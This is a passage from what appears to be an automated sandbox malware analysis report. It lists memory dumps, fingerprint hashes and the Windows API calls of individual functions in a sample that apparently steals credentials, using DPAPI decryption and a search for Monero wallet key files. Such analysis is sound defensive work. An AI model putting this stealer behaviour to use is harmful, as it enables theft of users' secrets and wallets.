                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: BinaryCryptString
                  • String ID:
                  • API String ID: 80407269-0
                  • Opcode ID: 4837d02e40bd09e3f4968a1013d76845c8730a0eab32e05c51ba47dd79d2acd1
                  • Instruction ID: d3ebb6565d0f9a8bb1989eae4e2e8b8ab36eedc07bac1771b37812b07f854ddf
                  • Opcode Fuzzy Hash: 4837d02e40bd09e3f4968a1013d76845c8730a0eab32e05c51ba47dd79d2acd1
                  • Instruction Fuzzy Hash: C4112E70220209FFDB00CF64D885FB7B3A9AF8A740F109568FA158B250DB75EC55DB61
                  Function 002F7A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0132EA50,00000000,?,00300E10,00000000,?,00000000,00000000), ref: 002F7A63
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002F7A6A
                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0132EA50,00000000,?,00300E10,00000000,?,00000000,00000000,?), ref: 002F7A7D
                  • wsprintfA.USER32 ref: 002F7AB7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                  • String ID:
                  • API String ID: 3317088062-0
                  • Opcode ID: e94a9c6dc2af06aa5595650546d1b31fad29e5688d68f53a02ce375787c89349
                  • Instruction ID: 7d8a5f7a03bb02577dbbd190f4ccebc181e95f7b4feb310fcf8fb247c834a116
                  • Opcode Fuzzy Hash: e94a9c6dc2af06aa5595650546d1b31fad29e5688d68f53a02ce375787c89349
                  • Instruction Fuzzy Hash: 21118EB1A45218EBEB208F54DC49FA9B778FB05761F1043AAEA1A932C0D7741A45CF51
                  Function 002F3720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                  Download Yara Rule
                  APIs
                  • CoCreateInstance.COMBASE(002FE118,00000000,00000001,002FE108,00000000), ref: 002F3758
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 002F37B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharCreateInstanceMultiWide
                  • String ID:
                  • API String ID: 123533781-0
                  • Opcode ID: a36e6e8dffd58209834fff857f5902e84f0700546ccfc8da9ee011ed8ea8a769
                  • Instruction ID: ec54402cdabd06b057cca9611eb8ea1be76b5f10ce9c88990bae479cd3b59e55
                  • Opcode Fuzzy Hash: a36e6e8dffd58209834fff857f5902e84f0700546ccfc8da9ee011ed8ea8a769
                  • Instruction Fuzzy Hash: 6741F870A10A2C9FDB24DB58CC94BABB7B5BB48702F4041D8E608E72D0D7B16E85CF50
                  Function 002E9B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 002E9B84
                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 002E9BA3
                  • LocalFree.KERNEL32(?), ref: 002E9BD3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Local$AllocCryptDataFreeUnprotect
                  • String ID:
                  • API String ID: 2068576380-0
                  • Opcode ID: 6e76929d9d564f97f8ccd86243ed6468064b322ea54642b5d1431c6f0c85502d
                  • Instruction ID: c3cc5fe904fe979ff396aea7a1ac78480c7ba51d289a930c93ca9e678e801a0d
                  • Opcode Fuzzy Hash: 6e76929d9d564f97f8ccd86243ed6468064b322ea54642b5d1431c6f0c85502d
                  • Instruction Fuzzy Hash: A91109B8A0020AEFCB04DF94D985AAEB7B5FF89300F1045A9F815A7350D770AE55CFA1
                  Function 006AB78E Relevance: 4.1, Strings: 2, Instructions: 1648COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: usr$w'k
                  • API String ID: 0-1752605985
                  • Opcode ID: a510ef89e07127b16c922a6bda51a5282a82cf7e5a2dba7102da9ddb83ade081
                  • Instruction ID: fc6f518b5d978cbb21f92e5c129436bb55197603188fab55f9527ed9fc545a42
                  • Opcode Fuzzy Hash: a510ef89e07127b16c922a6bda51a5282a82cf7e5a2dba7102da9ddb83ade081
                  • Instruction Fuzzy Hash: 60B217F360C204AFE704AE2DEC8577AB7E9EBD4720F1A853DE6C4C7744EA3558018696
                  Function 0058BD77 Relevance: 4.0, Strings: 3, Instructions: 256COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: "Y$"Y$=:^
                  • API String ID: 0-400678772
                  • Opcode ID: 0e5b85ea1259df2d18653c0e9e0dad59baee4a26f0a459a18c6def63808a0788
                  • Instruction ID: 9b849eb0f6cc23d7f9cdcb7fa6835240e728a09ef98d40f06d782fb11e984274
                  • Opcode Fuzzy Hash: 0e5b85ea1259df2d18653c0e9e0dad59baee4a26f0a459a18c6def63808a0788
                  • Instruction Fuzzy Hash: CB714AF3A083045FF3049E19EC8177BB7EAEBD4320F2A853DE98583780E93A5C058656
                  Function 00661424 Relevance: 4.0, Strings: 3, Instructions: 229COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 2,/v$Y`?$f/:+
                  • API String ID: 0-3509502552
                  • Opcode ID: 498fa2f64c52aeba4e9c1e91f417b9a9b2aa22998f2ffdc63649923319429494
                  • Instruction ID: ae89ae8b6953002547fa80fb0e9b7d407a9ac926dea9b5c3dba708c23d4f28b6
                  • Opcode Fuzzy Hash: 498fa2f64c52aeba4e9c1e91f417b9a9b2aa22998f2ffdc63649923319429494
                  • Instruction Fuzzy Hash: B46157B3E082149FE3046E19DC9477AB7D6EBD4720F2B463DDAC867384E9761C058786
                  Function 002EF68A Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002FA740: lstrcpy.KERNEL32(00300E17,00000000), ref: 002FA788
                    • Part of subcall function 002FA920: lstrcpy.KERNEL32(00000000,?), ref: 002FA972
                    • Part of subcall function 002FA920: lstrcat.KERNEL32(00000000), ref: 002FA982
                    • Part of subcall function 002FA9B0: lstrlen.KERNEL32(?,01328BA0,?,\Monero\wallet.keys,00300E17), ref: 002FA9C5
                    • Part of subcall function 002FA9B0: lstrcpy.KERNEL32(00000000), ref: 002FAA04
                    • Part of subcall function 002FA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002FAA12
                    • Part of subcall function 002FA8A0: lstrcpy.KERNEL32(?,00300E17), ref: 002FA905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,003015B8,00300D96), ref: 002EF71E
                  • StrCmpCA.SHLWAPI(?,003015BC), ref: 002EF76F
                  • StrCmpCA.SHLWAPI(?,003015C0), ref: 002EF785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 002EFAB1
                  • FindClose.KERNEL32(000000FF), ref: 002EFAC3
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: 6cc9905fa77e7ebc35fc860eccf5b550f15a3c455398264bba9d0f36d044597b
                  • Instruction ID: 22fe3040eb56e23c271384b31ffbde4a9472dcba165ce7c11dd678271125d231
                  • Opcode Fuzzy Hash: 6cc9905fa77e7ebc35fc860eccf5b550f15a3c455398264bba9d0f36d044597b
                  • Instruction Fuzzy Hash: E41175B182014D9BDB14EB60DC569FDB378AF11380F4083B5A61E56092EF702B5ACF92
                  Function 0063C40F Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: (s
                  • API String ID: 0-1718856627
                  • Opcode ID: 4051a4d3c38698210f50a853855bb9a22b7a7c7d38d843a7bd0ebea8c06e3cc9
                  • Instruction ID: f801abb4043ec21bf16baf5bbc560e35db3a87825619fcae7b9b7e67c4c52fca
                  • Opcode Fuzzy Hash: 4051a4d3c38698210f50a853855bb9a22b7a7c7d38d843a7bd0ebea8c06e3cc9
                  • Instruction Fuzzy Hash: 037104B3B082049FE708AE2DDC5677AB7E6EBD4320F1A493DE6C5C7384E9755C018686
                  Function 00605904 Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: SQ'7
                  • API String ID: 0-4160367805
                  • Opcode ID: f757fc9fc9c415be989effa0e9a34173e20e72ed445af56e0c54123430f2ce54
                  • Instruction ID: 3368fd4340513c083df2845e22d9468c2b764ab24618cbb844c102b39cc4b5d1
                  • Opcode Fuzzy Hash: f757fc9fc9c415be989effa0e9a34173e20e72ed445af56e0c54123430f2ce54
                  • Instruction Fuzzy Hash: 745136F3A086144BE3085E3DDC9532ABBDAEBD4320F2B823EE5D5D3788ED7559014282
                  Function 0064C6F0 Relevance: .2, Instructions: 239COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 619ba80489a8da876afbb0436bb6dead78f34ea8ff17ea7b52a0ad271dcfb675
                  • Instruction ID: 8e9c5b035c580e437b741893f2b16c1f6a414c94c2b6723c2701b42d14c4f82d
                  • Opcode Fuzzy Hash: 619ba80489a8da876afbb0436bb6dead78f34ea8ff17ea7b52a0ad271dcfb675
                  • Instruction Fuzzy Hash: E7713DF3E056105BF3445A3DED4872ABADB9BD4720F2F823CD99893B8CED79590A4181
                  Function 00551BF5 Relevance: .2, Instructions: 231COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2102186174.000000000053E000.00000040.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                  • Associated: 00000000.00000002.2101914382.00000000002E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.0000000000391000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000039D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.00000000003C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101950818.000000000052A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102186174.00000000007DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102564814.00000000007DC000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102701995.0000000000976000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102725282.0000000000977000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2e0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c35bf571a6bfb4931bb885bfa1bad91564278118e584eb4c125a69cdab11b3ec
